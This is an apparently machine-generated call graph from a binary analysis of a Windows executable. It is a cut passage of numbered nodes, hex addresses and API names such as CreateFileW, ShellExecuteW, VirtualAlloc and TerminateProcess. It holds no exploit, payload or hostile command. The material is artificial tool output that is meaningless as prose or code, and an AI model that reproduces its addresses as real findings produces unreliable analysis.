98321->98418 98324->98084 98325 1a845e 98326 1a846a 98325->98326 98327 1a828f 98325->98327 98326->98324 98390 1a7e86 98327->98390 98328->98320 98333 1a82c8 98405 13fc70 98333->98405 98336 1a82e8 98411 19359c 82 API calls __wsopen_s 98336->98411 98337 1a8302 98412 1263eb 22 API calls 98337->98412 98340 1a82f3 GetCurrentProcess TerminateProcess 98340->98337 98341->98321 98341->98327 98342 1a8311 98413 126a50 22 API calls 98342->98413 98344 1a832a 98353 1a8352 98344->98353 98414 1304f0 22 API calls 98344->98414 98346 1a84c5 98346->98324 98348 1a84d9 FreeLibrary 98346->98348 98347 1a8341 98415 1a8b7b 75 API calls 98347->98415 98348->98324 98353->98346 98416 1304f0 22 API calls 98353->98416 98417 12aceb 23 API calls messages 98353->98417 98419 1a8b7b 75 API calls 98353->98419 98355 127525 98354->98355 98370 127522 98354->98370 98356 12755b 98355->98356 98357 12752d 98355->98357 98359 12756d 98356->98359 98366 1650f6 98356->98366 98368 16500f 98356->98368 98420 1451c6 26 API calls 98357->98420 98421 13fb21 51 API calls 98359->98421 98360 12753d 98365 13fddb 22 API calls 98360->98365 98363 16510e 98363->98363 98367 127547 98365->98367 98423 145183 26 API calls 98366->98423 98369 129cb3 22 API calls 98367->98369 98371 13fe0b 22 API calls 98368->98371 98376 165088 98368->98376 98369->98370 98370->98324 98377 1a8cd3 98370->98377 98372 165058 98371->98372 98373 13fddb 22 API calls 98372->98373 98374 16507f 98373->98374 98375 129cb3 22 API calls 98374->98375 98375->98376 98422 13fb21 51 API calls 98376->98422 98378 12aec9 22 API calls 98377->98378 98379 1a8cee CharLowerBuffW 98378->98379 98424 188e54 98379->98424 98383 12a961 22 API calls 98384 1a8d2a 98383->98384 98431 126d25 98384->98431 98386 1a8d3e 98387 1293b2 22 API calls 98386->98387 98389 1a8d48 _wcslen 98387->98389 98388 1a8e5e _wcslen 98388->98320 98389->98388 98444 1a851d 42 API calls _strftime 98389->98444 98391 1a7eec 98390->98391 98392 1a7ea1 98390->98392 98396 1a9096 98391->98396 98393 13fe0b 22 API calls 98392->98393 98394 1a7ec3 98393->98394 98394->98391 98395 13fddb 22 API calls 98394->98395 98395->98394 98397 1a92ab messages 98396->98397 98404 1a90ba _strcat _wcslen 98396->98404 98397->98333 98398 12b6b5 39 API calls 98398->98404 98399 12b567 39 API calls 98399->98404 98400 12b38f 39 API calls 98400->98404 98401 127510 53 API calls 98401->98404 98402 14ea0c 21 API calls ___std_exception_copy 98402->98404 98404->98397 98404->98398 98404->98399 98404->98400 98404->98401 98404->98402 98448 18efae 24 API calls _wcslen 98404->98448 98407 13fc85 98405->98407 98406 13fd1d VirtualAlloc 98408 13fceb 98406->98408 98407->98406 98407->98408 98408->98336 98408->98337 98409->98320 98410->98320 98411->98340 98412->98342 98413->98344 98414->98347 98415->98353 98416->98353 98417->98353 98418->98325 98419->98353 98420->98360 98421->98360 98422->98366 98423->98363 98425 188e74 _wcslen 98424->98425 98426 188f63 98425->98426 98429 188ea9 98425->98429 98430 188f68 98425->98430 98426->98383 98426->98389 98429->98426 98445 13ce60 41 API calls 98429->98445 98430->98426 98446 13ce60 41 API calls 98430->98446 98432 126d91 98431->98432 98433 126d34 98431->98433 98435 1293b2 22 API calls 98432->98435 98433->98432 98434 126d3f 98433->98434 98436 126d5a 98434->98436 98437 164c9d 98434->98437 98441 126d62 __fread_nolock 98435->98441 98447 126f34 22 API calls 98436->98447 98439 13fddb 22 API calls 98437->98439 98440 164ca7 98439->98440 98442 13fe0b 22 API calls 98440->98442 98441->98386 98443 164cda 98442->98443 98444->98388 98445->98429 98446->98430 98447->98441 98448->98404 98450 126270 22 API calls 98449->98450 98469 129eb5 98450->98469 98451 129fd2 98492 12a4a1 98451->98492 98453 129fec 98453->98092 98456 16f699 98464 13fddb 22 API calls 98456->98464 98457 16f7c4 98504 1896e2 84 API calls __wsopen_s 98457->98504 98459 12a405 98459->98453 98505 1896e2 84 API calls __wsopen_s 98459->98505 98461 12a6c3 22 API calls 98461->98469 98463 16f7d2 98465 12a4a1 22 API calls 98463->98465 98466 16f754 98464->98466 98467 16f7e8 98465->98467 98468 13fe0b 22 API calls 98466->98468 98467->98453 98473 12a12c __fread_nolock 98468->98473 98469->98451 98469->98456 98469->98457 98469->98459 98469->98461 98471 12a587 22 API calls 98469->98471 98472 12aec9 22 API calls 98469->98472 98469->98473 98476 12a4a1 22 API calls 98469->98476 98491 124573 41 API calls _wcslen 98469->98491 98501 1248c8 23 API calls 98469->98501 98502 1249bd 22 API calls __fread_nolock 98469->98502 98503 12a673 22 API calls 98469->98503 98471->98469 98474 12a0db CharUpperBuffW 98472->98474 98473->98457 98473->98459 98500 12a673 22 API calls 98474->98500 98476->98469 98478 16f545 98477->98478 98479 129c7e 98477->98479 98480 16f556 98478->98480 98482 126b57 22 API calls 98478->98482 98484 13fddb 22 API calls 98479->98484 98481 12a6c3 22 API calls 98480->98481 98483 16f560 98481->98483 98482->98480 98483->98483 98485 129c91 98484->98485 98486 129c9a 98485->98486 98487 129cac 98485->98487 98488 129cb3 22 API calls 98486->98488 98489 12a961 22 API calls 98487->98489 98490 129ca2 98488->98490 98489->98490 98490->98096 98491->98469 98493 12a52b 98492->98493 98499 12a4b1 __fread_nolock 98492->98499 98495 13fe0b 22 API calls 98493->98495 98494 13fddb 22 API calls 98496 12a4b8 98494->98496 98495->98499 98497 13fddb 22 API calls 98496->98497 98498 12a4d6 98496->98498 98497->98498 98498->98453 98499->98494 98500->98469 98501->98469 98502->98469 98503->98469 98504->98463 98505->98453 98507 126250 98506->98507 98508 12625f 98506->98508 98507->98114 98508->98507 98509 126264 CloseHandle 98508->98509 98509->98507 98511 164035 98510->98511 98512 12575c CreateFileW 98510->98512 98513 16403b CreateFileW 98511->98513 98515 12577b 98511->98515 98512->98515 98514 164063 98513->98514 98513->98515 98585 1254c6 98514->98585 98515->98136 98515->98137 98519 1253f3 98518->98519 98532 1253f0 messages 98518->98532 98520 1254c6 3 API calls 98519->98520 98519->98532 98521 125410 98520->98521 98522 163f4b 98521->98522 98523 12541d 98521->98523 98597 13fa5b 98522->98597 98525 13fe0b 22 API calls 98523->98525 98526 125429 98525->98526 98527 125722 22 API calls 98526->98527 98528 125433 98527->98528 98591 129a40 98528->98591 98531 1254c6 3 API calls 98531->98532 98532->98142 98534 12b578 98533->98534 98535 12b57f 98533->98535 98534->98535 98603 1462d1 39 API calls 98534->98603 98535->98099 98537 12b5c2 98537->98099 98539 12a961 22 API calls 98538->98539 98540 125275 98539->98540 98541 12a961 22 API calls 98540->98541 98542 12527d 98541->98542 98543 12a961 22 API calls 98542->98543 98544 125285 98543->98544 98545 12a961 22 API calls 98544->98545 98546 12528d 98545->98546 98547 163df5 98546->98547 98548 1252c1 98546->98548 98549 12a8c7 22 API calls 98547->98549 98550 126d25 22 API calls 98548->98550 98551 163dfe 98549->98551 98552 1252cf 98550->98552 98553 12a6c3 22 API calls 98551->98553 98554 1293b2 22 API calls 98552->98554 98555 125304 98553->98555 98556 1252d9 98554->98556 98557 125349 98555->98557 98559 125325 98555->98559 98575 163e20 98555->98575 98556->98555 98558 126d25 22 API calls 98556->98558 98560 126d25 22 API calls 98557->98560 98561 1252fa 98558->98561 98559->98557 98564 124c6d 22 API calls 98559->98564 98562 12535a 98560->98562 98563 1293b2 22 API calls 98561->98563 98565 125370 98562->98565 98570 12a8c7 22 API calls 98562->98570 98563->98555 98567 125332 98564->98567 98566 125384 98565->98566 98571 12a8c7 22 API calls 98565->98571 98569 12538f 98566->98569 98573 12a8c7 22 API calls 98566->98573 98567->98557 98572 126d25 22 API calls 98567->98572 98568 126b57 22 API calls 98577 163ee0 98568->98577 98574 12a8c7 22 API calls 98569->98574 98579 12539a 98569->98579 98570->98565 98571->98566 98572->98557 98573->98569 98574->98579 98575->98568 98576 124c6d 22 API calls 98576->98577 98577->98557 98577->98576 98604 1249bd 22 API calls __fread_nolock 98577->98604 98579->98117 98580->98141 98581->98145 98582->98146 98583->98143 98584->98143 98586 1254dd 98585->98586 98587 125564 SetFilePointerEx SetFilePointerEx 98586->98587 98588 163f9c SetFilePointerEx 98586->98588 98589 125530 98586->98589 98590 163f8b 98586->98590 98587->98589 98589->98515 98590->98588 98592 129abb 98591->98592 98593 129a4e 98591->98593 98602 13e40f SetFilePointerEx 98592->98602 98594 12543f 98593->98594 98596 129a8c ReadFile 98593->98596 98594->98531 98596->98593 98596->98594 98598 1254c6 3 API calls 98597->98598 98599 13fa79 98598->98599 98600 1254c6 3 API calls 98599->98600 98601 13fa9a 98600->98601 98601->98532 98602->98593 98603->98537 98604->98577 98606 18dbdc GetFileAttributesW 98605->98606 98607 18d4d5 98605->98607 98606->98607 98608 18dbe8 FindFirstFileW 98606->98608 98607->98027 98608->98607 98609 18dbf9 FindClose 98608->98609 98609->98607 98611 13f188 98610->98611 98612 13f14c 98610->98612 98613 12a6c3 22 API calls 98611->98613 98612->98611 98614 13f15b 98612->98614 98623 18caeb 98613->98623 98615 13f170 98614->98615 98616 13f17d 98614->98616 98632 13f18e 98615->98632 98639 18cbf2 26 API calls 98616->98639 98620 18cb1a 98620->98199 98621 13f179 98621->98199 98623->98620 98640 18ca89 ReadFile SetFilePointerEx 98623->98640 98641 1249bd 22 API calls __fread_nolock 98623->98641 98624->98206 98625->98205 98626->98208 98627->98212 98628->98160 98629->98160 98630->98195 98631->98204 98642 13f1d8 98632->98642 98638 13f1c1 98638->98621 98639->98621 98640->98623 98641->98623 98643 13fe0b 22 API calls 98642->98643 98644 13f1ef 98643->98644 98645 13fddb 22 API calls 98644->98645 98646 13f1a6 98645->98646 98647 1297b6 98646->98647 98654 129a1e 98647->98654 98649 1297fc 98649->98638 98653 126e14 24 API calls 98649->98653 98650 129a40 2 API calls 98651 1297c7 98650->98651 98651->98649 98651->98650 98661 129b01 22 API calls __fread_nolock 98651->98661 98653->98638 98655 129a2f 98654->98655 98656 16f378 98654->98656 98655->98651 98657 13fddb 22 API calls 98656->98657 98658 16f382 98657->98658 98659 13fe0b 22 API calls 98658->98659 98660 16f397 98659->98660 98661->98651 98663 18d7d8 98662->98663 98664 18d7dd 98663->98664 98665 18d7f3 98663->98665 98667 18d7ee 98664->98667 98669 12a8c7 22 API calls 98664->98669 98666 12a961 22 API calls 98665->98666 98668 18d7fb 98666->98668 98667->98286 98670 12a961 22 API calls 98668->98670 98669->98667 98671 18d803 98670->98671 98672 12a961 22 API calls 98671->98672 98673 18d80e 98672->98673 98674 12a961 22 API calls 98673->98674 98675 18d816 98674->98675 98676 12a961 22 API calls 98675->98676 98677 18d81e 98676->98677 98678 12a961 22 API calls 98677->98678 98679 18d826 98678->98679 98680 12a961 22 API calls 98679->98680 98681 18d82e 98680->98681 98682 12a961 22 API calls 98681->98682 98683 18d836 98682->98683 98684 12525f 22 API calls 98683->98684 98685 18d84d 98684->98685 98686 12525f 22 API calls 98685->98686 98687 18d866 98686->98687 98688 124c6d 22 API calls 98687->98688 98689 18d872 98688->98689 98690 18d885 98689->98690 98691 1293b2 22 API calls 98689->98691 98692 124c6d 22 API calls 98690->98692 98691->98690 98693 18d88e 98692->98693 98694 18d89e 98693->98694 98696 1293b2 22 API calls 98693->98696 98695 18d8b0 98694->98695 98697 12a8c7 22 API calls 98694->98697 98698 126350 22 API calls 98695->98698 98696->98694 98697->98695 98699 18d8bb 98698->98699 98773 18d978 22 API calls 98699->98773 98701 18d8ca 98774 18d978 22 API calls 98701->98774 98703 18d8dd 98704 124c6d 22 API calls 98703->98704 98705 18d8e7 98704->98705 98706 18d8ec 98705->98706 98707 18d8fe 98705->98707 98708 1233c6 22 API calls 98706->98708 98709 124c6d 22 API calls 98707->98709 98711 18d8f9 98708->98711 98710 18d907 98709->98710 98712 18d925 98710->98712 98713 1233c6 22 API calls 98710->98713 98714 126350 22 API calls 98711->98714 98715 126350 22 API calls 98712->98715 98713->98711 98714->98712 98715->98667 98717 192954 __wsopen_s 98716->98717 98718 13fe0b 22 API calls 98717->98718 98719 192971 98718->98719 98720 125722 22 API calls 98719->98720 98721 19297b 98720->98721 98722 19274e 27 API calls 98721->98722 98723 192986 98722->98723 98724 12511f 64 API calls 98723->98724 98725 19299b 98724->98725 98726 192a6c 98725->98726 98727 1929bf 98725->98727 98728 192e66 75 API calls 98726->98728 98729 192e66 75 API calls 98727->98729 98730 192a38 98728->98730 98731 1929c4 98729->98731 98733 1250f5 40 API calls 98730->98733 98737 192a75 messages 98730->98737 98731->98737 98779 14d583 26 API calls 98731->98779 98734 192a91 98733->98734 98735 1250f5 40 API calls 98734->98735 98736 192aa1 98735->98736 98739 1250f5 40 API calls 98736->98739 98737->98292 98738 1929ed 98780 14d583 26 API calls 98738->98780 98741 192abc 98739->98741 98742 1250f5 40 API calls 98741->98742 98743 192acc 98742->98743 98744 1250f5 40 API calls 98743->98744 98745 192ae7 98744->98745 98746 1250f5 40 API calls 98745->98746 98747 192af7 98746->98747 98748 1250f5 40 API calls 98747->98748 98749 192b07 98748->98749 98750 1250f5 40 API calls 98749->98750 98751 192b17 98750->98751 98775 193017 GetTempPathW GetTempFileNameW 98751->98775 98753 192b22 98754 14e5eb 29 API calls 98753->98754 98764 192b33 98754->98764 98755 192bed 98756 14e678 67 API calls 98755->98756 98757 192bf8 98756->98757 98759 192bfe DeleteFileW 98757->98759 98760 192c12 98757->98760 98758 1250f5 40 API calls 98758->98764 98759->98737 98761 192c91 CopyFileW 98760->98761 98767 192c18 98760->98767 98762 192cb9 DeleteFileW 98761->98762 98763 192ca7 DeleteFileW 98761->98763 98776 192fd8 CreateFileW 98762->98776 98763->98737 98764->98737 98764->98755 98764->98758 98766 14dbb3 65 API calls 98764->98766 98766->98764 98768 1922ce 79 API calls 98767->98768 98769 192c7c 98768->98769 98769->98762 98770 192c80 DeleteFileW 98769->98770 98770->98737 98771->98254 98772->98267 98773->98701 98774->98703 98775->98753 98777 192fff SetFileTime CloseHandle 98776->98777 98778 193013 98776->98778 98777->98778 98778->98737 98779->98738 98780->98730 98781 1590fa 98782 159107 98781->98782 98786 15911f 98781->98786 98831 14f2d9 20 API calls __dosmaperr 98782->98831 98784 15910c 98832 1527ec 26 API calls __fread_nolock 98784->98832 98787 15917a 98786->98787 98795 159117 98786->98795 98833 15fdc4 21 API calls 2 library calls 98786->98833 98789 14d955 __fread_nolock 26 API calls 98787->98789 98790 159192 98789->98790 98801 158c32 98790->98801 98792 159199 98793 14d955 __fread_nolock 26 API calls 98792->98793 98792->98795 98794 1591c5 98793->98794 98794->98795 98796 14d955 __fread_nolock 26 API calls 98794->98796 98797 1591d3 98796->98797 98797->98795 98798 14d955 __fread_nolock 26 API calls 98797->98798 98799 1591e3 98798->98799 98800 14d955 __fread_nolock 26 API calls 98799->98800 98800->98795 98802 158c3e ___scrt_is_nonwritable_in_current_image 98801->98802 98803 158c46 98802->98803 98804 158c5e 98802->98804 98835 14f2c6 20 API calls __dosmaperr 98803->98835 98806 158d24 98804->98806 98809 158c97 98804->98809 98842 14f2c6 20 API calls __dosmaperr 98806->98842 98808 158c4b 98836 14f2d9 20 API calls __dosmaperr 98808->98836 98812 158ca6 98809->98812 98813 158cbb 98809->98813 98810 158d29 98843 14f2d9 20 API calls __dosmaperr 98810->98843 98837 14f2c6 20 API calls __dosmaperr 98812->98837 98834 155147 EnterCriticalSection 98813->98834 98815 158c53 __fread_nolock 98815->98792 98818 158cb3 98844 1527ec 26 API calls __fread_nolock 98818->98844 98819 158cab 98838 14f2d9 20 API calls __dosmaperr 98819->98838 98820 158cc1 98822 158cf2 98820->98822 98823 158cdd 98820->98823 98825 158d45 __fread_nolock 38 API calls 98822->98825 98839 14f2d9 20 API calls __dosmaperr 98823->98839 98827 158ced 98825->98827 98841 158d1c LeaveCriticalSection __wsopen_s 98827->98841 98828 158ce2 98840 14f2c6 20 API calls __dosmaperr 98828->98840 98831->98784 98832->98795 98833->98787 98834->98820 98835->98808 98836->98815 98837->98819 98838->98818 98839->98828 98840->98827 98841->98815 98842->98810 98843->98818 98844->98815 98845 1403fb 98846 140407 ___scrt_is_nonwritable_in_current_image 98845->98846 98874 13feb1 98846->98874 98848 14040e 98849 140561 98848->98849 98852 140438 98848->98852 98901 14083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98849->98901 98851 140568 98902 144e52 28 API calls _abort 98851->98902 98863 140477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98852->98863 98885 15247d 98852->98885 98854 14056e 98903 144e04 28 API calls _abort 98854->98903 98858 140576 98859 140457 98861 1404d8 98893 140959 98861->98893 98863->98861 98897 144e1a 38 API calls 2 library calls 98863->98897 98865 1404de 98866 1404f3 98865->98866 98898 140992 GetModuleHandleW 98866->98898 98868 1404fa 98868->98851 98869 1404fe 98868->98869 98870 140507 98869->98870 98899 144df5 28 API calls _abort 98869->98899 98900 140040 13 API calls 2 library calls 98870->98900 98873 14050f 98873->98859 98875 13feba 98874->98875 98904 140698 IsProcessorFeaturePresent 98875->98904 98877 13fec6 98905 142c94 10 API calls 3 library calls 98877->98905 98879 13fecb 98880 13fecf 98879->98880 98906 152317 98879->98906 98880->98848 98883 13fee6 98883->98848 98886 152494 98885->98886 98887 140a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98886->98887 98888 140451 98887->98888 98888->98859 98889 152421 98888->98889 98890 152450 98889->98890 98891 140a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98890->98891 98892 152479 98891->98892 98892->98863 98957 142340 98893->98957 98895 14096c GetStartupInfoW 98896 14097f 98895->98896 98896->98865 98897->98861 98898->98868 98899->98870 98900->98873 98901->98851 98902->98854 98903->98858 98904->98877 98905->98879 98910 15d1f6 98906->98910 98909 142cbd 8 API calls 3 library calls 98909->98880 98911 15d213 98910->98911 98912 15d20f 98910->98912 98911->98912 98916 154bfb 98911->98916 98913 140a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98912->98913 98914 13fed8 98913->98914 98914->98883 98914->98909 98917 154c07 ___scrt_is_nonwritable_in_current_image 98916->98917 98928 152f5e EnterCriticalSection 98917->98928 98919 154c0e 98929 1550af 98919->98929 98921 154c1d 98927 154c2c 98921->98927 98942 154a8f 29 API calls 98921->98942 98924 154c27 98943 154b45 GetStdHandle GetFileType 98924->98943 98926 154c3d __fread_nolock 98926->98911 98944 154c48 LeaveCriticalSection _abort 98927->98944 98928->98919 98930 1550bb ___scrt_is_nonwritable_in_current_image 98929->98930 98931 1550df 98930->98931 98932 1550c8 98930->98932 98945 152f5e EnterCriticalSection 98931->98945 98953 14f2d9 20 API calls __dosmaperr 98932->98953 98935 1550cd 98954 1527ec 26 API calls __fread_nolock 98935->98954 98938 1550d7 __fread_nolock 98938->98921 98940 155117 98955 15513e LeaveCriticalSection _abort 98940->98955 98941 1550eb 98941->98940 98946 155000 98941->98946 98942->98924 98943->98927 98944->98926 98945->98941 98947 154c7d __dosmaperr 20 API calls 98946->98947 98948 155012 98947->98948 98952 15501f 98948->98952 98956 153405 11 API calls 2 library calls 98948->98956 98949 1529c8 _free 20 API calls 98950 155071 98949->98950 98950->98941 98952->98949 98953->98935 98954->98938 98955->98938 98956->98948 98958 142357 98957->98958 98958->98895 98958->98958 98959 122de3 98960 122df0 __wsopen_s 98959->98960 98961 122e09 98960->98961 98962 162c2b ___scrt_fastfail 98960->98962 98963 123aa2 23 API calls 98961->98963 98965 162c47 GetOpenFileNameW 98962->98965 98964 122e12 98963->98964 98975 122da5 98964->98975 98967 162c96 98965->98967 98969 126b57 22 API calls 98967->98969 98970 162cab 98969->98970 98970->98970 98972 122e27 98993 1244a8 98972->98993 98976 161f50 __wsopen_s 98975->98976 98977 122db2 GetLongPathNameW 98976->98977 98978 126b57 22 API calls 98977->98978 98979 122dda 98978->98979 98980 123598 98979->98980 98981 12a961 22 API calls 98980->98981 98982 1235aa 98981->98982 98983 123aa2 23 API calls 98982->98983 98984 1235b5 98983->98984 98985 1235c0 98984->98985 98986 1632eb 98984->98986 98988 12515f 22 API calls 98985->98988 98990 16330d 98986->98990 99028 13ce60 41 API calls 98986->99028 98989 1235cc 98988->98989 99022 1235f3 98989->99022 98992 1235df 98992->98972 98994 124ecb 94 API calls 98993->98994 98996 1244cd 98994->98996 98995 163833 98998 192cf9 80 API calls 98995->98998 98996->98995 98997 124ecb 94 API calls 98996->98997 98999 1244e1 98997->98999 99000 163848 98998->99000 98999->98995 99001 1244e9 98999->99001 99002 16384c 99000->99002 99003 163869 99000->99003 99006 163854 99001->99006 99007 1244f5 99001->99007 99004 124f39 68 API calls 99002->99004 99005 13fe0b 22 API calls 99003->99005 99004->99006 99021 1638ae 99005->99021 99045 18da5a 82 API calls 99006->99045 99044 12940c 136 API calls 2 library calls 99007->99044 99010 163862 99010->99003 99011 122e31 99012 124f39 68 API calls 99015 163a5f 99012->99015 99013 12a4a1 22 API calls 99013->99021 99015->99012 99047 18989b 82 API calls __wsopen_s 99015->99047 99018 129cb3 22 API calls 99018->99021 99021->99013 99021->99015 99021->99018 99029 18967e 99021->99029 99032 190b5a 99021->99032 99038 123ff7 99021->99038 99046 1895ad 42 API calls _wcslen 99021->99046 99023 123605 99022->99023 99027 123624 __fread_nolock 99022->99027 99025 13fe0b 22 API calls 99023->99025 99024 13fddb 22 API calls 99026 12363b 99024->99026 99025->99027 99026->98992 99027->99024 99028->98986 99030 13fe0b 22 API calls 99029->99030 99031 1896ae __fread_nolock 99030->99031 99031->99021 99033 190b65 99032->99033 99034 13fddb 22 API calls 99033->99034 99035 190b7c 99034->99035 99036 129cb3 22 API calls 99035->99036 99037 190b87 99036->99037 99037->99021 99039 12400a 99038->99039 99041 1240ae 99038->99041 99040 13fe0b 22 API calls 99039->99040 99042 12403c 99039->99042 99040->99042 99041->99021 99042->99041 99043 13fddb 22 API calls 99042->99043 99043->99042 99044->99011 99045->99010 99046->99021 99047->99015 99048 162ba5 99049 122b25 99048->99049 99050 162baf 99048->99050 99076 122b83 7 API calls 99049->99076 99052 123a5a 24 API calls 99050->99052 99054 162bb8 99052->99054 99056 129cb3 22 API calls 99054->99056 99057 162bc6 99056->99057 99059 162bf5 99057->99059 99060 162bce 99057->99060 99058 122b2f 99063 123837 49 API calls 99058->99063 99066 122b44 99058->99066 99062 1233c6 22 API calls 99059->99062 99061 1233c6 22 API calls 99060->99061 99064 162bd9 99061->99064 99065 162bf1 GetForegroundWindow ShellExecuteW 99062->99065 99063->99066 99068 126350 22 API calls 99064->99068 99072 162c26 99065->99072 99067 122b5f 99066->99067 99080 1230f2 Shell_NotifyIconW ___scrt_fastfail 99066->99080 99073 122b66 SetCurrentDirectoryW 99067->99073 99071 162be7 99068->99071 99074 1233c6 22 API calls 99071->99074 99072->99067 99075 122b7a 99073->99075 99074->99065 99081 122cd4 7 API calls 99076->99081 99078 122b2a 99079 122c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99078->99079 99079->99058 99080->99067 99081->99078 99082 121044 99087 1210f3 99082->99087 99084 12104a 99123 1400a3 29 API calls __onexit 99084->99123 99086 121054 99124 121398 99087->99124 99091 12116a 99092 12a961 22 API calls 99091->99092 99093 121174 99092->99093 99094 12a961 22 API calls 99093->99094 99095 12117e 99094->99095 99096 12a961 22 API calls 99095->99096 99097 121188 99096->99097 99098 12a961 22 API calls 99097->99098 99099 1211c6 99098->99099 99100 12a961 22 API calls 99099->99100 99101 121292 99100->99101 99134 12171c 99101->99134 99105 1212c4 99106 12a961 22 API calls 99105->99106 99107 1212ce 99106->99107 99108 131940 9 API calls 99107->99108 99109 1212f9 99108->99109 99155 121aab 99109->99155 99111 121315 99112 121325 GetStdHandle 99111->99112 99113 162485 99112->99113 99114 12137a 99112->99114 99113->99114 99115 16248e 99113->99115 99117 121387 OleInitialize 99114->99117 99116 13fddb 22 API calls 99115->99116 99118 162495 99116->99118 99117->99084 99162 19011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99118->99162 99120 16249e 99163 190944 CreateThread 99120->99163 99122 1624aa CloseHandle 99122->99114 99123->99086 99164 1213f1 99124->99164 99127 1213f1 22 API calls 99128 1213d0 99127->99128 99129 12a961 22 API calls 99128->99129 99130 1213dc 99129->99130 99131 126b57 22 API calls 99130->99131 99132 121129 99131->99132 99133 121bc3 6 API calls 99132->99133 99133->99091 99135 12a961 22 API calls 99134->99135 99136 12172c 99135->99136 99137 12a961 22 API calls 99136->99137 99138 121734 99137->99138 99139 12a961 22 API calls 99138->99139 99140 12174f 99139->99140 99141 13fddb 22 API calls 99140->99141 99142 12129c 99141->99142 99143 121b4a 99142->99143 99144 121b58 99143->99144 99145 12a961 22 API calls 99144->99145 99146 121b63 99145->99146 99147 12a961 22 API calls 99146->99147 99148 121b6e 99147->99148 99149 12a961 22 API calls 99148->99149 99150 121b79 99149->99150 99151 12a961 22 API calls 99150->99151 99152 121b84 99151->99152 99153 13fddb 22 API calls 99152->99153 99154 121b96 RegisterWindowMessageW 99153->99154 99154->99105 99156 121abb 99155->99156 99157 16272d 99155->99157 99159 13fddb 22 API calls 99156->99159 99171 193209 23 API calls 99157->99171 99160 121ac3 99159->99160 99160->99111 99161 162738 99162->99120 99163->99122 99172 19092a 28 API calls 99163->99172 99165 12a961 22 API calls 99164->99165 99166 1213fc 99165->99166 99167 12a961 22 API calls 99166->99167 99168 121404 99167->99168 99169 12a961 22 API calls 99168->99169 99170 1213c6 99169->99170 99170->99127 99171->99161 99173 158402 99178 1581be 99173->99178 99176 15842a 99183 1581ef try_get_first_available_module 99178->99183 99180 1583ee 99197 1527ec 26 API calls __fread_nolock 99180->99197 99182 158343 99182->99176 99190 160984 99182->99190 99186 158338 99183->99186 99193 148e0b 40 API calls 2 library calls 99183->99193 99185 15838c 99185->99186 99194 148e0b 40 API calls 2 library calls 99185->99194 99186->99182 99196 14f2d9 20 API calls __dosmaperr 99186->99196 99188 1583ab 99188->99186 99195 148e0b 40 API calls 2 library calls 99188->99195 99198 160081 99190->99198 99192 16099f 99192->99176 99193->99185 99194->99188 99195->99186 99196->99180 99197->99182 99201 16008d ___scrt_is_nonwritable_in_current_image 99198->99201 99199 16009b 99255 14f2d9 20 API calls __dosmaperr 99199->99255 99201->99199 99203 1600d4 99201->99203 99202 1600a0 99256 1527ec 26 API calls __fread_nolock 99202->99256 99209 16065b 99203->99209 99208 1600aa __fread_nolock 99208->99192 99210 160678 99209->99210 99211 1606a6 99210->99211 99212 16068d 99210->99212 99258 155221 99211->99258 99272 14f2c6 20 API calls __dosmaperr 99212->99272 99215 1606ab 99216 1606b4 99215->99216 99217 1606cb 99215->99217 99274 14f2c6 20 API calls __dosmaperr 99216->99274 99271 16039a CreateFileW 99217->99271 99221 1606b9 99275 14f2d9 20 API calls __dosmaperr 99221->99275 99223 160781 GetFileType 99227 1607d3 99223->99227 99228 16078c GetLastError 99223->99228 99224 160692 99273 14f2d9 20 API calls __dosmaperr 99224->99273 99225 160756 GetLastError 99277 14f2a3 20 API calls __dosmaperr 99225->99277 99226 160704 99226->99223 99226->99225 99276 16039a CreateFileW 99226->99276 99280 15516a 21 API calls 2 library calls 99227->99280 99278 14f2a3 20 API calls __dosmaperr 99228->99278 99231 16079a CloseHandle 99231->99224 99233 1607c3 99231->99233 99279 14f2d9 20 API calls __dosmaperr 99233->99279 99235 160749 99235->99223 99235->99225 99237 1607f4 99239 160840 99237->99239 99281 1605ab 72 API calls 3 library calls 99237->99281 99238 1607c8 99238->99224 99244 16086d 99239->99244 99282 16014d 72 API calls 4 library calls 99239->99282 99242 160866 99243 16087e 99242->99243 99242->99244 99246 1600f8 99243->99246 99247 1608fc CloseHandle 99243->99247 99245 1586ae __wsopen_s 29 API calls 99244->99245 99245->99246 99257 160121 LeaveCriticalSection __wsopen_s 99246->99257 99283 16039a CreateFileW 99247->99283 99249 160927 99250 16095d 99249->99250 99251 160931 GetLastError 99249->99251 99250->99246 99284 14f2a3 20 API calls __dosmaperr 99251->99284 99253 16093d 99285 155333 21 API calls 2 library calls 99253->99285 99255->99202 99256->99208 99257->99208 99259 15522d ___scrt_is_nonwritable_in_current_image 99258->99259 99286 152f5e EnterCriticalSection 99259->99286 99261 15527b 99287 15532a 99261->99287 99262 155259 99264 155000 __wsopen_s 21 API calls 99262->99264 99267 15525e 99264->99267 99265 1552a4 __fread_nolock 99265->99215 99266 155234 99266->99261 99266->99262 99268 1552c7 EnterCriticalSection 99266->99268 99267->99261 99290 155147 EnterCriticalSection 99267->99290 99268->99261 99269 1552d4 LeaveCriticalSection 99268->99269 99269->99266 99271->99226 99272->99224 99273->99246 99274->99221 99275->99224 99276->99235 99277->99224 99278->99231 99279->99238 99280->99237 99281->99239 99282->99242 99283->99249 99284->99253 99285->99250 99286->99266 99291 152fa6 LeaveCriticalSection 99287->99291 99289 155331 99289->99265 99290->99261 99291->99289 99292 172a00 99293 12d7b0 messages 99292->99293 99294 12db11 PeekMessageW 99293->99294 99295 12d807 GetInputState 99293->99295 99296 171cbe TranslateAcceleratorW 99293->99296 99298 12db8f PeekMessageW 99293->99298 99299 12da04 timeGetTime 99293->99299 99300 12db73 TranslateMessage DispatchMessageW 99293->99300 99301 12dbaf Sleep 99293->99301 99302 172b74 Sleep 99293->99302 99303 171dda timeGetTime 99293->99303 99313 12d9d5 99293->99313 99319 12ec40 256 API calls 99293->99319 99322 131310 256 API calls 99293->99322 99324 12dd50 99293->99324 99331 12dfd0 99293->99331 99354 12bf40 256 API calls 2 library calls 99293->99354 99355 13edf6 IsDialogMessageW GetClassLongW 99293->99355 99357 193a2a 23 API calls 99293->99357 99358 19359c 